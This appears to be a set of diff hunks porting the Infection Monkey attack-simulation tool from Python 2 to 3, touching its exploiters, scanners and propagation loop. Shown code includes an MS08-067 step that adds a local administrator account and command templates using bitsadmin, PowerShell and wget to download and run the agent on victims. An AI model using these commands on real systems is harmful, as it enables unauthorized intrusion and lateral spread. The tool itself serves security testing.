LOG.error('Failed to send payload to %s', self.host.ip_addr)
|
||||
LOG.info('Failed to send payload to %s: %s', self.host.ip_addr, str(e))
|
||||
return False
|
||||
|
||||
def socket_send(self, s, message):
|
||||
|
@ -61,7 +61,7 @@ class VSFTPDExploiter(HostExploiter):
|
|||
s.send(message)
|
||||
return True
|
||||
except socket.error as e:
|
||||
LOG.error('Failed to send payload to %s', self.host.ip_addr)
|
||||
LOG.info('Failed to send payload to %s: %s', self.host.ip_addr, str(e))
|
||||
return False
|
||||
|
||||
def _exploit_host(self):
|
||||
|
@ -71,9 +71,9 @@ class VSFTPDExploiter(HostExploiter):
|
|||
if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
|
||||
ftp_socket.recv(RECV_128).decode('utf-8')
|
||||
|
||||
if self.socket_send_recv(ftp_socket, USERNAME + '\n'):
|
||||
if self.socket_send_recv(ftp_socket, USERNAME + b'\n'):
|
||||
time.sleep(FTP_TIME_BUFFER)
|
||||
self.socket_send(ftp_socket, PASSWORD + '\n')
|
||||
self.socket_send(ftp_socket, PASSWORD + b'\n')
|
||||
ftp_socket.close()
|
||||
LOG.info('Backdoor Enabled, Now we can run commands')
|
||||
else:
|
||||
|
|
|
@ -4,9 +4,10 @@ from posixpath import join
|
|||
from abc import abstractmethod
|
||||
|
||||
from infection_monkey.exploit import HostExploiter
|
||||
from infection_monkey.model import *
|
||||
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
|
||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||
from infection_monkey.model import CHECK_COMMAND, ID_STRING, GET_ARCH_LINUX, GET_ARCH_WINDOWS, BITSADMIN_CMDLINE_HTTP, \
|
||||
POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD, DOWNLOAD_TIMEOUT, CHMOD_MONKEY, RUN_MONKEY, MONKEY_ARG, DROPPER_ARG
|
||||
from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service
|
||||
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
|
||||
from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING
|
||||
|
@ -256,7 +257,7 @@ class WebRCE(HostExploiter):
|
|||
if 'No such file' in resp:
|
||||
return False
|
||||
else:
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % str(host))
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % str(self.host))
|
||||
return True
|
||||
|
||||
def check_remote_files(self, url):
|
||||
|
@ -284,7 +285,7 @@ class WebRCE(HostExploiter):
|
|||
"""
|
||||
ports = self.get_open_service_ports(ports, names)
|
||||
if not ports:
|
||||
LOG.info("All default web ports are closed on %r, skipping", str(host))
|
||||
LOG.info("All default web ports are closed on %r, skipping", str(self.host))
|
||||
return False
|
||||
else:
|
||||
return ports
|
||||
|
@ -374,7 +375,7 @@ class WebRCE(HostExploiter):
|
|||
T1222Telem(ScanStatus.SCANNED, "", self.host).send()
|
||||
return False
|
||||
# If exploiter returns True / False
|
||||
if type(resp) is bool:
|
||||
if isinstance(resp, bool):
|
||||
LOG.info("Permission change finished")
|
||||
return resp
|
||||
# If exploiter returns command output, we can check for execution errors
|
||||
|
@ -410,7 +411,7 @@ class WebRCE(HostExploiter):
|
|||
try:
|
||||
resp = self.exploit(url, command)
|
||||
# If exploiter returns True / False
|
||||
if type(resp) is bool:
|
||||
if isinstance(resp, bool):
|
||||
LOG.info("Execution attempt successfully finished")
|
||||
self.add_executed_cmd(command)
|
||||
return resp
|
||||
|
@ -461,7 +462,7 @@ class WebRCE(HostExploiter):
|
|||
"""
|
||||
src_path = get_target_monkey(self.host)
|
||||
if not src_path:
|
||||
LOG.info("Can't find suitable monkey executable for host %r", host)
|
||||
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
# Determine which destination path to use
|
||||
dest_path = self.get_monkey_upload_path(src_path)
|
||||
|
|
|
@ -1,18 +1,16 @@
|
|||
from __future__ import print_function
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
import copy
|
||||
|
||||
from requests import post, exceptions
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.exploit import HostExploiter
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
from infection_monkey.network.info import get_free_tcp_port
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||
|
||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
||||
|
@ -34,7 +32,6 @@ HEADERS = {
|
|||
|
||||
|
||||
class WebLogicExploiter(HostExploiter):
|
||||
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
_EXPLOITED_SERVICE = 'Weblogic'
|
||||
|
||||
|
|
|
@ -162,7 +162,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
|
||||
def is_os_supported(self):
|
||||
if self.host.os.get('type') in self._TARGET_OS_TYPE and \
|
||||
self.host.os.get('version') in self._windows_versions.keys():
|
||||
self.host.os.get('version') in list(self._windows_versions.keys()):
|
||||
return True
|
||||
|
||||
if not self.host.os.get('type') or (
|
||||
|
@ -172,7 +172,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
smb_finger = SMBFinger()
|
||||
if smb_finger.get_host_fingerprint(self.host):
|
||||
return self.host.os.get('type') in self._TARGET_OS_TYPE and \
|
||||
self.host.os.get('version') in self._windows_versions.keys()
|
||||
self.host.os.get('version') in list(self._windows_versions.keys())
|
||||
return False
|
||||
|
||||
def _exploit_host(self):
|
||||
|
@ -191,11 +191,11 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
try:
|
||||
sock = exploit.start()
|
||||
|
||||
sock.send("cmd /c (net user %s %s /add) &&"
|
||||
" (net localgroup administrators %s /add)\r\n" %
|
||||
(self._config.user_to_add,
|
||||
sock.send("cmd /c (net user {} {} /add) &&"
|
||||
" (net localgroup administrators {} /add)\r\n".format(
|
||||
self._config.user_to_add,
|
||||
self._config.remote_user_pass,
|
||||
self._config.user_to_add))
|
||||
self._config.user_to_add).encode())
|
||||
time.sleep(2)
|
||||
reply = sock.recv(1000)
|
||||
|
||||
|
|
|
@ -39,7 +39,8 @@ class WmiExploiter(HostExploiter):
|
|||
password_hashed = self._config.hash_sensitive_data(password)
|
||||
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
|
||||
mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
|
||||
creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): ({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed)
|
||||
creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \
|
||||
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed)
|
||||
LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging)
|
||||
|
||||
wmi_connection = WmiTools.WmiConnection()
|
||||
|
@ -104,9 +105,9 @@ class WmiExploiter(HostExploiter):
|
|||
ntpath.split(remote_full_path)[0],
|
||||
None)
|
||||
|
||||
if (0 != result.ProcessId) and (0 == result.ReturnValue):
|
||||
LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
|
||||
remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline)
|
||||
if (0 != result.ProcessId) and (not result.ReturnValue):
|
||||
LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
|
||||
remote_full_path, self.host, result.ProcessId, cmdline)
|
||||
|
||||
self.add_vuln_port(port='unknown')
|
||||
success = True
|
||||
|
@ -121,4 +122,3 @@ class WmiExploiter(HostExploiter):
|
|||
return success
|
||||
|
||||
return False
|
||||
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
from __future__ import print_function
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import logging
|
||||
|
@ -23,8 +21,11 @@ LOG = None
|
|||
|
||||
LOG_CONFIG = {'version': 1,
|
||||
'disable_existing_loggers': False,
|
||||
'formatters': {'standard': {
|
||||
'format': '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'},
|
||||
'formatters': {
|
||||
'standard': {
|
||||
'format':
|
||||
'%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'
|
||||
},
|
||||
},
|
||||
'handlers': {'console': {'class': 'logging.StreamHandler',
|
||||
'level': 'DEBUG',
|
||||
|
|
|
@ -5,17 +5,20 @@ __author__ = 'itamar'
|
|||
MONKEY_ARG = "m0nk3y"
|
||||
DROPPER_ARG = "dr0pp3r"
|
||||
ID_STRING = "M0NK3Y3XPL0ITABLE"
|
||||
DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
|
||||
MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||
MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, )
|
||||
DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG,)
|
||||
MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG,)
|
||||
MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,)
|
||||
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
|
||||
DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
|
||||
MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
|
||||
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
||||
DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG,)
|
||||
MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG,)
|
||||
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \
|
||||
'/c %%(monkey_path)s %s"' % (MONKEY_ARG,)
|
||||
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \
|
||||
'file_path)s exit)) > NUL 2>&1 '
|
||||
|
||||
# Commands used for downloading monkeys
|
||||
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
||||
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \
|
||||
"monkey_path)s\' -UseBasicParsing\" "
|
||||
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
||||
BITSADMIN_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||
|
|
|
@ -35,10 +35,10 @@ class VictimHost(object):
|
|||
def __str__(self):
|
||||
victim = "Victim Host %s: " % self.ip_addr
|
||||
victim += "OS - ["
|
||||
for k, v in self.os.items():
|
||||
for k, v in list(self.os.items()):
|
||||
victim += "%s-%s " % (k, v)
|
||||
victim += "] Services - ["
|
||||
for k, v in self.services.items():
|
||||
for k, v in list(self.services.items()):
|
||||
victim += "%s-%s " % (k, v)
|
||||
victim += '] '
|
||||
victim += "target monkey: %s" % self.monkey_exe
|
||||
|
|
|
@ -17,8 +17,8 @@ class VictimHostGeneratorTester(TestCase):
|
|||
generator = VictimHostGenerator(test_ranges, '10.0.0.1', [])
|
||||
victims = generator.generate_victims(chunk_size)
|
||||
for i in range(5): # quickly check the equally sided chunks
|
||||
self.assertEqual(len(victims.next()), chunk_size)
|
||||
victim_chunk_last = victims.next()
|
||||
self.assertEqual(len(next(victims)), chunk_size)
|
||||
victim_chunk_last = next(victims)
|
||||
self.assertEqual(len(victim_chunk_last), 1)
|
||||
|
||||
def test_remove_blocked_ip(self):
|
||||
|
|
|
@ -4,12 +4,11 @@ import os
|
|||
import subprocess
|
||||
import sys
|
||||
import time
|
||||
from six.moves import xrange
|
||||
|
||||
import infection_monkey.tunnel as tunnel
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir
|
||||
from infection_monkey.utils.monkey_log_path import get_monkey_log_path
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
from infection_monkey.config import WormConfiguration
|
||||
from infection_monkey.control import ControlClient
|
||||
from infection_monkey.model import DELAY_DELETE_CMD
|
||||
|
@ -26,8 +25,8 @@ from infection_monkey.telemetry.trace_telem import TraceTelem
|
|||
from infection_monkey.telemetry.tunnel_telem import TunnelTelem
|
||||
from infection_monkey.windows_upgrader import WindowsUpgrader
|
||||
from infection_monkey.post_breach.post_breach_handler import PostBreach
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
|
||||
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
|
||||
from common.utils.attack_utils import ScanStatus, UsageEnum
|
||||
|
||||
|
@ -138,7 +137,7 @@ class InfectionMonkey(object):
|
|||
else:
|
||||
LOG.debug("Running with depth: %d" % WormConfiguration.depth)
|
||||
|
||||
for iteration_index in xrange(WormConfiguration.max_iterations):
|
||||
for iteration_index in range(WormConfiguration.max_iterations):
|
||||
ControlClient.keepalive()
|
||||
ControlClient.load_control_config()
|
||||
|
||||
|
@ -183,7 +182,7 @@ class InfectionMonkey(object):
|
|||
if self._default_server:
|
||||
if self._network.on_island(self._default_server):
|
||||
machine.set_default_server(get_interface_to_target(machine.ip_addr) +
|
||||
(':'+self._default_server_port if self._default_server_port else ''))
|
||||
(':' + self._default_server_port if self._default_server_port else ''))
|
||||
else:
|
||||
machine.set_default_server(self._default_server)
|
||||
LOG.debug("Default server for machine: %r set to %s" % (machine, machine.default_server))
|
||||
|
@ -193,7 +192,9 @@ class InfectionMonkey(object):
|
|||
self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value)
|
||||
host_exploited = False
|
||||
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
|
||||
|
||||
if self.try_exploiting(machine, exploiter):
|
||||
|
||||
host_exploited = True
|
||||
VictimHostTelem('T1210', ScanStatus.USED, machine=machine).send()
|
||||
break
|
||||
|
@ -259,7 +260,7 @@ class InfectionMonkey(object):
|
|||
try:
|
||||
status = None
|
||||
if "win32" == sys.platform:
|
||||
from _subprocess import SW_HIDE, STARTF_USESHOWWINDOW, CREATE_NEW_CONSOLE
|
||||
from subprocess import SW_HIDE, STARTF_USESHOWWINDOW, CREATE_NEW_CONSOLE
|
||||
startupinfo = subprocess.STARTUPINFO()
|
||||
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
|
||||
startupinfo.wShowWindow = SW_HIDE
|
||||
|
@ -312,6 +313,8 @@ class InfectionMonkey(object):
|
|||
machine, exploiter.__class__.__name__, exc)
|
||||
self.successfully_exploited(machine, exploiter)
|
||||
return True
|
||||
except FailedExploitationError as e:
|
||||
LOG.info("Failed exploiting %r with exploiter %s, %s", machine, exploiter.__class__.__name__, e)
|
||||
except Exception as exc:
|
||||
LOG.exception("Exception while attacking %s using %s: %s",
|
||||
machine, exploiter.__class__.__name__, exc)
|
||||
|
|
|
@ -38,6 +38,7 @@ def main():
|
|||
debug=False,
|
||||
strip=get_exe_strip(),
|
||||
upx=True,
|
||||
upx_exclude=['vcruntime140.dll'],
|
||||
console=True,
|
||||
icon=get_exe_icon())
|
||||
|
||||
|
@ -67,17 +68,11 @@ def process_datas(orig_datas):
|
|||
|
||||
|
||||
def get_binaries():
|
||||
binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries()
|
||||
binaries = [] if is_windows() else get_linux_only_binaries()
|
||||
binaries += get_sc_binaries()
|
||||
return binaries
|
||||
|
||||
|
||||
def get_windows_only_binaries():
|
||||
binaries = []
|
||||
binaries += get_msvcr()
|
||||
return binaries
|
||||
|
||||
|
||||
def get_linux_only_binaries():
|
||||
binaries = []
|
||||
binaries += get_traceroute_binaries()
|
||||
|
@ -92,10 +87,6 @@ def get_sc_binaries():
|
|||
return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']]
|
||||
|
||||
|
||||
def get_msvcr():
|
||||
return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')]
|
||||
|
||||
|
||||
def get_traceroute_binaries():
|
||||
traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64'
|
||||
return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')]
|
||||
|
|
|
@ -19,7 +19,7 @@ class VirtualFile(BytesIO):
|
|||
if name in VirtualFile._vfs:
|
||||
super(VirtualFile, self).__init__(self._vfs[name])
|
||||
else:
|
||||
super(VirtualFile, self).__init__('')
|
||||
super(VirtualFile, self).__init__()
|
||||
|
||||
def flush(self):
|
||||
super(VirtualFile, self).flush()
|
||||
|
@ -34,7 +34,6 @@ class VirtualFile(BytesIO):
|
|||
return path in VirtualFile._vfs
|
||||
|
||||
|
||||
|
||||
def getsize(path):
|
||||
if path.startswith(MONKEYFS_PREFIX):
|
||||
return VirtualFile.getsize(path)
|
||||
|
@ -53,6 +52,7 @@ def virtual_path(name):
|
|||
return "%s%s" % (MONKEYFS_PREFIX, name)
|
||||
|
||||
|
||||
# noinspection PyShadowingBuiltins
|
||||
def open(name, mode='r', buffering=-1):
|
||||
# use normal open for regular paths, and our "virtual" open for monkeyfs:// paths
|
||||
if name.startswith(MONKEYFS_PREFIX):
|
||||
|
|
|
@ -1,20 +1,17 @@
|
|||
from abc import ABCMeta, abstractmethod, abstractproperty
|
||||
from abc import ABCMeta, abstractmethod
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
||||
class HostScanner(object):
|
||||
__metaclass__ = ABCMeta
|
||||
|
||||
class HostScanner(object, metaclass=ABCMeta):
|
||||
@abstractmethod
|
||||
def is_host_alive(self, host):
|
||||
raise NotImplementedError()
|
||||
|
||||
|
||||
class HostFinger(object):
|
||||
__metaclass__ = ABCMeta
|
||||
|
||||
@abstractproperty
|
||||
class HostFinger(object, metaclass=ABCMeta):
|
||||
@property
|
||||
@abstractmethod
|
||||
def _SCANNED_SERVICE(self):
|
||||
pass
|
||||
|
||||
|
|
|
@ -4,10 +4,11 @@ import platform
|
|||
|
||||
|
||||
def _run_netsh_cmd(command, args):
|
||||
cmd = subprocess.Popen("netsh %s %s" % (command, " ".join(['%s="%s"' % (key, value) for key, value in args.items()
|
||||
cmd = subprocess.Popen("netsh %s %s" % (command, " ".join(['%s="%s"' % (key, value) for key, value in list(args.items())
|
||||
if value])), stdout=subprocess.PIPE)
|
||||
return cmd.stdout.read().strip().lower().endswith('ok.')
|
||||
|
||||
|
||||
class FirewallApp(object):
|
||||
def is_enabled(self, **kwargs):
|
||||
return False
|
||||
|
@ -24,7 +25,7 @@ class FirewallApp(object):
|
|||
def __enter__(self):
|
||||
return self
|
||||
|
||||
def __exit__(self, type, value, traceback):
|
||||
def __exit__(self, exc_type, value, traceback):
|
||||
self.close()
|
||||
|
||||
def close(self):
|
||||
|
@ -48,9 +49,9 @@ class WinAdvFirewall(FirewallApp):
|
|||
except:
|
||||
return None
|
||||
|
||||
def add_firewall_rule(self, name="Firewall", dir="in", action="allow", program=sys.executable, **kwargs):
|
||||
def add_firewall_rule(self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs):
|
||||
netsh_args = {'name': name,
|
||||
'dir': dir,
|
||||
'dir': direction,
|
||||
'action': action,
|
||||
'program': program}
|
||||
netsh_args.update(kwargs)
|
||||
|
@ -81,18 +82,18 @@ class WinAdvFirewall(FirewallApp):
|
|||
if not self.is_enabled():
|
||||
return True
|
||||
|
||||
for rule in self._rules.values():
|
||||
for rule in list(self._rules.values()):
|
||||
if rule.get('program') == sys.executable and \
|
||||
'in' == rule.get('dir') and \
|
||||
'allow' == rule.get('action') and \
|
||||
4 == len(rule.keys()):
|
||||
4 == len(list(rule.keys())):
|
||||
return True
|
||||
return False
|
||||
|
||||
def close(self):
|
||||
try:
|
||||
for rule in self._rules.keys():
|
||||
self.remove_firewall_rule({'name': rule})
|
||||
for rule in list(self._rules.keys()):
|
||||
self.remove_firewall_rule(name=rule)
|
||||
except:
|
||||
pass
|
||||
|
||||
|
@ -151,14 +152,14 @@ class WinFirewall(FirewallApp):
|
|||
if not self.is_enabled():
|
||||
return True
|
||||
|
||||
for rule in self._rules.values():
|
||||
for rule in list(self._rules.values()):
|
||||
if rule.get('program') == sys.executable and 'ENABLE' == rule.get('mode'):
|
||||
return True
|
||||
return False
|
||||
|
||||
def close(self):
|
||||
try:
|
||||
for rule in self._rules.values():
|
||||
for rule in list(self._rules.values()):
|
||||
self.remove_firewall_rule(**rule)
|
||||
except:
|
||||
pass
|
||||
|
|
|
@ -39,7 +39,7 @@ class HTTPFinger(HostFinger):
|
|||
ssl = True if 'https://' in url else False
|
||||
self.init_service(host.services, ('tcp-' + port[1]), port[0])
|
||||
host.services['tcp-' + port[1]]['name'] = 'http'
|
||||
host.services['tcp-' + port[1]]['data'] = (server,ssl)
|
||||
host.services['tcp-' + port[1]]['data'] = (server, ssl)
|
||||
LOG.info("Port %d is open on host %s " % (port[0], host))
|
||||
break # https will be the same on the same port
|
||||
except Timeout:
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
import os
|
||||
import sys
|
||||
import socket
|
||||
import struct
|
||||
import psutil
|
||||
|
@ -13,15 +11,15 @@ import requests
|
|||
from requests import ConnectionError
|
||||
|
||||
from common.network.network_range import CidrRange
|
||||
|
||||
try:
|
||||
long # Python 2
|
||||
except NameError:
|
||||
long = int # Python 3
|
||||
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
|
||||
# Timeout for monkey connections
|
||||
TIMEOUT = 15
|
||||
LOOPBACK_NAME = b"lo"
|
||||
SIOCGIFADDR = 0x8915 # get PA address
|
||||
SIOCGIFNETMASK = 0x891b # get network PA mask
|
||||
RTF_UP = 0x0001 # Route usable
|
||||
RTF_REJECT = 0x0200
|
||||
|
||||
|
||||
def get_host_subnets():
|
||||
|
@ -44,36 +42,25 @@ def get_host_subnets():
|
|||
if 'broadcast' in network:
|
||||
network.pop('broadcast')
|
||||
for attr in network:
|
||||
network[attr] = network[attr].encode('utf-8').strip()
|
||||
network[attr] = network[attr]
|
||||
return ipv4_nets
|
||||
|
||||
|
||||
if sys.platform == "win32":
|
||||
|
||||
if is_windows_os():
|
||||
def local_ips():
|
||||
local_hostname = socket.gethostname()
|
||||
return socket.gethostbyname_ex(local_hostname)[2]
|
||||
|
||||
|
||||
def get_routes():
|
||||
raise NotImplementedError()
|
||||
|
||||
else:
|
||||
from fcntl import ioctl
|
||||
|
||||
|
||||
def local_ips():
|
||||
valid_ips = [network['addr'] for network in get_host_subnets()]
|
||||
return valid_ips
|
||||
|
||||
|
||||
def get_routes(): # based on scapy implementation for route parsing
|
||||
LOOPBACK_NAME = "lo"
|
||||
SIOCGIFADDR = 0x8915 # get PA address
|
||||
SIOCGIFNETMASK = 0x891b # get network PA mask
|
||||
RTF_UP = 0x0001 # Route usable
|
||||
RTF_REJECT = 0x0200
|
||||
|
||||
try:
|
||||
f = open("/proc/net/route", "r")
|
||||
except IOError:
|
||||
|
@ -90,7 +77,7 @@ else:
|
|||
routes.append((dst, msk, "0.0.0.0", LOOPBACK_NAME, ifaddr))
|
||||
|
||||
for l in f.readlines()[1:]:
|
||||
iff, dst, gw, flags, x, x, x, msk, x, x, x = l.split()
|
||||
iff, dst, gw, flags, x, x, x, msk, x, x, x = [var.encode() for var in l.split()]
|
||||
flags = int(flags, 16)
|
||||
if flags & RTF_UP == 0:
|
||||
continue
|
||||
|
@ -106,9 +93,9 @@ else:
|
|||
ifaddr = socket.inet_ntoa(ifreq[20:24])
|
||||
else:
|
||||
continue
|
||||
routes.append((socket.htonl(long(dst, 16)) & 0xffffffff,
|
||||
socket.htonl(long(msk, 16)) & 0xffffffff,
|
||||
socket.inet_ntoa(struct.pack("I", long(gw, 16))),
|
||||
routes.append((socket.htonl(int(dst, 16)) & 0xffffffff,
|
||||
socket.htonl(int(msk, 16)) & 0xffffffff,
|
||||
socket.inet_ntoa(struct.pack("I", int(gw, 16))),
|
||||
iff, ifaddr))
|
||||
|
||||
f.close()
|
||||
|
@ -158,13 +145,13 @@ def get_interfaces_ranges():
|
|||
for net_interface in ifs:
|
||||
address_str = net_interface['addr']
|
||||
netmask_str = net_interface['netmask']
|
||||
ip_interface = ipaddress.ip_interface(u"%s/%s" % (address_str, netmask_str))
|
||||
ip_interface = ipaddress.ip_interface("%s/%s" % (address_str, netmask_str))
|
||||
# limit subnet scans to class C only
|
||||
res.append(CidrRange(cidr_range="%s/%s" % (address_str, netmask_str)))
|
||||
return res
|
||||
|
||||
|
||||
if sys.platform == "win32":
|
||||
if is_windows_os():
|
||||
def get_ip_for_connection(target_ip):
|
||||
return None
|
||||
else:
|
||||
|
|
|
@ -1,3 +1,4 @@
|
|||
import errno
|
||||
import logging
|
||||
import socket
|
||||
|
||||
|
@ -11,7 +12,6 @@ LOG = logging.getLogger(__name__)
|
|||
|
||||
|
||||
class MSSQLFinger(HostFinger):
|
||||
|
||||
# Class related consts
|
||||
SQL_BROWSER_DEFAULT_PORT = 1434
|
||||
BUFFER_SIZE = 4096
|
||||
|
@ -54,7 +54,7 @@ class MSSQLFinger(HostFinger):
|
|||
sock.close()
|
||||
return False
|
||||
except socket.error as e:
|
||||
if e.errno == socket.errno.ECONNRESET:
|
||||
if e.errno == errno.ECONNRESET:
|
||||
LOG.info('Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.'
|
||||
.format(host))
|
||||
else:
|
||||
|
|
|
@ -50,7 +50,7 @@ class MySQLFinger(HostFinger):
|
|||
return False
|
||||
|
||||
version, curpos = struct_unpack_tracker_string(data, curpos) # special coded to solve string parsing
|
||||
version = version[0]
|
||||
version = version[0].decode()
|
||||
self.init_service(host.services, SQL_SERVICE, MYSQL_PORT)
|
||||
host.services[SQL_SERVICE]['version'] = version
|
||||
version = version.split('-')[0].split('.')
|
||||
|
|
|
@ -48,13 +48,13 @@ class NetworkScanner(object):
|
|||
subnets_to_scan = []
|
||||
if len(WormConfiguration.inaccessible_subnets) > 1:
|
||||
for subnet_str in WormConfiguration.inaccessible_subnets:
|
||||
if NetworkScanner._is_any_ip_in_subnet([unicode(x) for x in self._ip_addresses], subnet_str):
|
||||
if NetworkScanner._is_any_ip_in_subnet([str(x) for x in self._ip_addresses], subnet_str):
|
||||
# If machine has IPs from 2 different subnets in the same group, there's no point checking the other
|
||||
# subnet.
|
||||
for other_subnet_str in WormConfiguration.inaccessible_subnets:
|
||||
if other_subnet_str == subnet_str:
|
||||
continue
|
||||
if not NetworkScanner._is_any_ip_in_subnet([unicode(x) for x in self._ip_addresses],
|
||||
if not NetworkScanner._is_any_ip_in_subnet([str(x) for x in self._ip_addresses],
|
||||
other_subnet_str):
|
||||
subnets_to_scan.append(NetworkRange.get_range_obj(other_subnet_str))
|
||||
break
|
||||
|
@ -85,7 +85,7 @@ class NetworkScanner(object):
|
|||
return
|
||||
|
||||
results = pool.map(self.scan_machine, victim_chunk)
|
||||
resulting_victims = filter(lambda x: x is not None, results)
|
||||
resulting_victims = [x for x in results if x is not None]
|
||||
for victim in resulting_victims:
|
||||
LOG.debug("Found potential victim: %r", victim)
|
||||
victims_count += 1
|
||||
|
|
|
@ -20,7 +20,6 @@ LOG = logging.getLogger(__name__)
|
|||
|
||||
|
||||
class PingScanner(HostScanner, HostFinger):
|
||||
|
||||
_SCANNED_SERVICE = ''
|
||||
|
||||
def __init__(self):
|
||||
|
@ -49,13 +48,12 @@ class PingScanner(HostScanner, HostFinger):
|
|||
if not "win32" == sys.platform:
|
||||
timeout /= 1000
|
||||
|
||||
sub_proc = subprocess.Popen(["ping",
|
||||
PING_COUNT_FLAG,
|
||||
"1",
|
||||
PING_TIMEOUT_FLAG,
|
||||
str(timeout), host.ip_addr],
|
||||
sub_proc = subprocess.Popen(
|
||||
["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
|
||||
stdout=subprocess.PIPE,
|
||||
stderr=subprocess.PIPE)
|
||||
stderr=subprocess.PIPE,
|
||||
